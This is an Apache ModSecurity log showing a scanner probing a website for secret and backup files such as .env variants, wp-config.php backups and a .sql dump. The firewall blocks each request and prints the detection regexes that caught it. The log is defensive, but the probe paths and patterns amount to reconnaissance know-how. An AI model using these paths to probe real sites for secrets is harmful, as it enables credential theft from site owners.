[Tue May 26 14:49:47.580787 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuJQAArh8"]
[Tue May 26 14:49:47.584969 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuIAAAri8"]
[Tue May 26 14:49:47.586029 2026] [security2:error] [pid 648203:tid 648442] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuKAAAAPI"]
[Tue May 26 14:49:47.590723 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuJAAAALs"]
[Tue May 26 14:49:47.592533 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuHwAArho"]
[Tue May 26 14:49:47.592970 2026] [security2:error] [pid 648203:tid 648222] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/web/.env"] [unique_id "ahVls7EQDDtxJNiDrdTuOgAArhI"]
[Tue May 26 14:49:48.205418 2026] [security2:error] [pid 648203:tid 648392] [client 57.141.2.35:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuSAAAAMA"]
[Tue May 26 14:49:48.280873 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuLQAArgo"]
[Tue May 26 14:49:48.283637 2026] [security2:error] [pid 648203:tid 648383] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuLwAAALc"]
[Tue May 26 14:49:48.295748 2026] [security2:error] [pid 648203:tid 648380] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuMQAAALQ"]
[Tue May 26 14:49:48.299447 2026] [security2:error] [pid 648203:tid 648361] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuMwAAAKE"]
[Tue May 26 14:49:48.336988 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuRQAArjo"]
[Tue May 26 14:49:48.338194 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuRAAArjI"]
[Tue May 26 14:49:48.345081 2026] [security2:error] [pid 648203:tid 648394] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuVgAAAMI"]
[Tue May 26 14:49:48.347474 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuWQAAAOQ"]
[Tue May 26 14:49:48.349780 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuQgAArj0"]
[Tue May 26 14:49:48.350577 2026] [security2:error] [pid 648203:tid 648450] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuXQAAAPo"]
[Tue May 26 14:49:48.351434 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuQwAArjU"]
[Tue May 26 14:49:48.354404 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuWgAAAM8"]
[Tue May 26 14:49:48.359781 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuUgAArig"]
[Tue May 26 14:49:48.374606 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuSQAArgI"]
[Tue May 26 14:49:48.380852 2026] [security2:error] [pid 648203:tid 648374] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuSgAArn8"]
[Tue May 26 14:49:48.381164 2026] [security2:error] [pid 648203:tid 648359] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVls7EQDDtxJNiDrdTuXAAAAJ8"]
[Tue May 26 14:49:48.429428 2026] [security2:error] [pid 648203:tid 648245] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/website/.env"] [unique_id "ahVltLEQDDtxJNiDrdTucgAAnik"]
[Tue May 26 14:49:48.442468 2026] [security2:error] [pid 648203:tid 648455] [client 104.207.50.40:34397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "200"] [hostname "velanstore.ca"] [uri "/wp-login.php"] [unique_id "ahVls7EQDDtxJNiDrdTuDgAAAP8"], referer: https://velanstore.ca/wp-login.php
[Tue May 26 14:49:48.444843 2026] [security2:error] [pid 648203:tid 648321] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 95.10.148.45.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php"] [unique_id "ahVltLEQDDtxJNiDrdTueAAAuXU"]
[Tue May 26 14:49:48.447661 2026] [security2:error] [pid 648203:tid 648227] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.bak"] [unique_id "ahVltLEQDDtxJNiDrdTueQAAuRc"]
[Tue May 26 14:49:48.483966 2026] [security2:error] [pid 648203:tid 648271] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.new"] [unique_id "ahVltLEQDDtxJNiDrdTuewAAuUM"]
[Tue May 26 14:49:48.485118 2026] [security2:error] [pid 648203:tid 648286] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 1). Pattern match "/wp-config\\\\.php(?:\\\\W[a-z]*|bak)" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "300"] [id "900256"] [msg "Wp-Config Backup/edit file request"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-config.php.old"] [unique_id "ahVltLEQDDtxJNiDrdTufAAAuVI"]
[Tue May 26 14:49:48.496902 2026] [security2:error] [pid 648203:tid 648221] [remote 45.148.10.95:10594] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.sql$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1288"] [id "350590"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access raw SQL files (disable this rule if you require access to files that end with .sql)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/wp-content/mysql.sql"] [unique_id "ahVltLEQDDtxJNiDrdTufgAAuRE"]
[Tue May 26 14:49:48.502049 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTudgAAALs"]
[Tue May 26 14:49:48.546275 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTufwAAuTY"]
[Tue May 26 14:49:48.552995 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTugAAAuRU"]
[Tue May 26 14:49:48.565563 2026] [security2:error] [pid 648203:tid 648385] [client 45.148.10.95:10594] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTufQAAuSw"]
[Tue May 26 14:49:48.575434 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTugwAAAP0"]
[Tue May 26 14:49:48.846554 2026] [security2:error] [pid 648203:tid 648364] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTujgAAAKQ"]
[Tue May 26 14:49:48.866528 2026] [security2:error] [pid 648203:tid 648443] [client 45.148.10.95:54224] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTujwAAAPM"]
[Tue May 26 14:49:48.897401 2026] [security2:error] [pid 648203:tid 648344] [client 45.148.10.95:54276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahVltLEQDDtxJNiDrdTunAAAAJA"]
[Tue May 26 14:49:48.912579 2026] [security2:error] [pid 648203:tid 648370] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTukgAAAKo"]
[Tue May 26 14:49:48.937423 2026] [security2:error] [pid 648203:tid 648460] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTulQAAAQQ"]
[Tue May 26 14:49:48.944015 2026] [security2:error] [pid 648203:tid 648335] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTumAAAAIc"]
[Tue May 26 14:49:48.977850 2026] [security2:error] [pid 648203:tid 648397] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltLEQDDtxJNiDrdTunwAAAMU"]
[Tue May 26 14:49:49.015413 2026] [security2:error] [pid 648203:tid 648410] [client 45.148.10.95:54224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(\\\\/\\\\*\\\\!? ?(?:select|grant|delete|insert|drop|alter|replace|truncate|update|create|rename|describe|union|concat|group_concat))" at REQUEST_FILENAME. [file "/opt/mod_security/hg_rules.conf"] [line "1019"] [id "9000042"] [rev "2.2.2"] [msg "SQL Comment Sequence Detected."] [data "/*update"] [hostname "www.leakyleaks.moes-art.com"] [uri "/*update.cgi*"] [unique_id "ahVltbEQDDtxJNiDrdTuqwAAANI"]
[Tue May 26 14:49:49.051294 2026] [security2:error] [pid 648203:tid 648423] [client 45.148.10.95:54276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.docker/.env"] [unique_id "ahVltbEQDDtxJNiDrdTurwAAAN8"]
[Tue May 26 14:49:49.086361 2026] [security2:error] [pid 648203:tid 648389] [client 45.148.10.95:54244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.docker/laravel/app/.env"] [unique_id "ahVltbEQDDtxJNiDrdTuswAAAL0"]
[Tue May 26 14:49:49.089775 2026] [security2:error] [pid 648203:tid 648373] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTurgAAAK0"]
[Tue May 26 14:49:49.094179 2026] [security2:error] [pid 648203:tid 648452] [client 45.148.10.95:54316] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/backend/.env"] [unique_id "ahVltbEQDDtxJNiDrdTutgAAAPw"]
[Tue May 26 14:49:49.152275 2026] [security2:error] [pid 648203:tid 648428] [client 45.148.10.95:54202] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTutQAAAOQ"]
[Tue May 26 14:49:49.203562 2026] [security2:error] [pid 648203:tid 648407] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuuwAAAM8"]
[Tue May 26 14:49:49.210849 2026] [security2:error] [pid 648203:tid 648440] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuvgAAAPA"]
[Tue May 26 14:49:49.235448 2026] [security2:error] [pid 648203:tid 648368] [client 45.148.10.95:54244] ModSecurity: Access denied with code 406 (phase 2). Pattern match "\\\\.backup$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1279"] [id "390588"] [rev "1"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that end with .backup)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.backup"] [unique_id "ahVltbEQDDtxJNiDrdTuwAAAAKg"]
[Tue May 26 14:49:49.239697 2026] [security2:error] [pid 648203:tid 648434] [client 45.148.10.95:54224] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\.bak|\\\\.bak\\\\.php)$" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "1260"] [id "390582"] [rev "2"] [msg "Atomicorp.com WAF Rules: Attack Blocked -  Data leakage - attempt to access backup file (disable this rule if you require access to files that nclude .bak)"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env.bak"] [unique_id "ahVltbEQDDtxJNiDrdTuwwAAAOo"]
[Tue May 26 14:49:49.296464 2026] [security2:error] [pid 648203:tid 648346] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuwgAAAJI"]
[Tue May 26 14:49:49.322731 2026] [security2:error] [pid 648203:tid 648358] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuxgAAAJ4"]
[Tue May 26 14:49:49.331880 2026] [security2:error] [pid 648203:tid 648455] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuyQAAAP8"]
[Tue May 26 14:49:49.339336 2026] [security2:error] [pid 648203:tid 648387] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuzAAAALs"]
[Tue May 26 14:49:49.366413 2026] [security2:error] [pid 648203:tid 648453] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTuzwAAAP0"]
[Tue May 26 14:49:49.372268 2026] [security2:error] [pid 648203:tid 648352] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu0gAAAJg"]
[Tue May 26 14:49:49.401348 2026] [security2:error] [pid 648203:tid 648365] [client 45.148.10.95:54304] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu0wAAAKU"]
[Tue May 26 14:49:49.432315 2026] [security2:error] [pid 648203:tid 648441] [client 45.148.10.95:54276] ModSecurity: Access denied with code 406 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|httpd\\\\.conf|boot\\\\.ini|web.config)\\\\b|( |^|\\\\.\\\\.)/etc/|/\\\\.(?:history|bash_history|sh_history|env)$)" at REQUEST_FILENAME. [file "/etc/httpd/modsecurity.d/10_asl_rules.conf"] [line "211"] [id "390709"] [rev "30"] [msg "Atomicorp.com WAF Rules: Attempt to access protected file remotely"] [data "/.env"] [severity "CRITICAL"] [hostname "www.leakyleaks.moes-art.com"] [uri "/.env"] [unique_id "ahVltbEQDDtxJNiDrdTu1wAAAPE"]
[Tue May 26 14:49:49.454457 2026] [security2:error] [pid 648203:tid 648343] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu1gAAAI8"]
[Tue May 26 14:49:49.516853 2026] [security2:error] [pid 648203:tid 648351] [client 45.148.10.95:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "www.leakyleaks.moes-art.com"] [uri "/index.php"] [unique_id "ahVltbEQDDtxJNiDrdTu3gAAAJc"]
